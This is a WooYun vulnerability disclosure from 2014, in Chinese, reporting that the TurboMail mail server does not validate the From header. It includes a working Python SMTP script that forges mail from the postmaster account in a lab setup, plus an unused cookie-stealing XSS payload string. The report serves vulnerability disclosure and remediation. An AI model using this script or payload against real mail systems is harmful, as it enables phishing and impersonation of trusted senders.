当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077987

漏洞标题:TurboMail邮件系统伪造邮件漏洞,可实施邮件钓鱼

相关厂商:turbomail.org

漏洞作者: 路人甲

提交时间:2014-10-08 16:47

修复时间:2014-12-30 14:44

公开时间:2014-12-30 14:44

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-08: 细节已通知厂商并且等待厂商处理中
2014-10-08: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-12-02: 细节向核心白帽子及相关领域专家公开
2014-12-12: 细节向普通白帽子公开
2014-12-22: 细节向实习白帽子公开
2014-12-30: 细节向公众公开

简要描述:

TurboMail邮件系统存在邮件伪造漏洞,可实施邮件钓鱼攻击..

详细说明:

TurboMail邮件系统在发送邮件时没有对邮件协议的From字段进行有效验证,发件人可以伪造任意用户进行发送邮件,达到邮件欺骗攻击的目的,可以用来进行邮件钓鱼等。
TurboMail邮件系统下载链接:http://www.turbomail.org/download.html
测试环境:Win2003 + turbomail_win_520.exe

漏洞证明:

本地安装Windows版本的TurboMail邮件系统
1)使用邮件系统管理用户添加2个测试账号[email protected][email protected]

1.png


2)漏洞利用代码
这里直接贴上利用脚本:

这里直接贴上利用脚本:
#!/user/bin/python
import smtplib
import datetime
MailTemplate = '''From: {From}\nTo: {To}\nSubject: {Subject}\nDate: {Date}\nContent-type: {ContentType}\n\n{Msg}\r\n\r\n'''
payload = """<img/src/onerror=alert(document.cookie)>"""
def SendTurboMail(Server,Username,Password,Sender,Reciever,MailMsg):
try:
SmtpObj = smtplib.SMTP(Server)
SmtpObj.login(Username, Password)
print 'Sending Email'
SmtpObj.sendmail(Sender, Reciever, MailMsg)
except Exception:
print "Error: unable to send email"
return False
print "Successfully sent email"
SmtpObj.quit()
if __name__ == '__main__':
server = '192.168.43.132'
username = '[email protected]'
password = 'qwerty123456'
sender = '[email protected]'
reciever = '[email protected]'
subject = 'fake sender'
date = datetime.datetime.now().strftime("%a, %d %b %Y %H:%M:%S +0800")
msg = 'this a mail from ' + sender
frm = 'postmaster'+'<[email protected]>' #fake sender
#frm = 'test1'+'<'+sender+'>'
to = 'test2'+'<'+reciever+'>'
mailmsg = MailTemplate.format(From=frm,To=to,Subject=subject,Date=date,ContentType='text/html',Msg=msg)
SendTurboMail(server, username, password,sender,reciever,mailmsg)


利用脚本实现的功能:使用账号[email protected](密码:qwerty123456)登录邮件系后,伪造邮件报文的frm<发送人>字段,并将邮件发送给[email protected]用户,由于Turbomail邮件系统未对frm字段进行严格的验证,导致[email protected]登录邮件系统后会收到一封发件人为postmaster<[email protected]>管理员发送来的邮件
利用演示:
1)[email protected]成功发送一封伪造frm字段的邮件给[email protected]

1.png


2) [email protected]登录邮件系统后,收到了这封[email protected]发送的伪造邮件

2.png

修复方案:

加强对邮件协议frm字段的验证

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-30 14:44

厂商回复:

在系统设置-》smtp服务 可以启动对这类伪装邮件地址的判断

最新状态:

暂无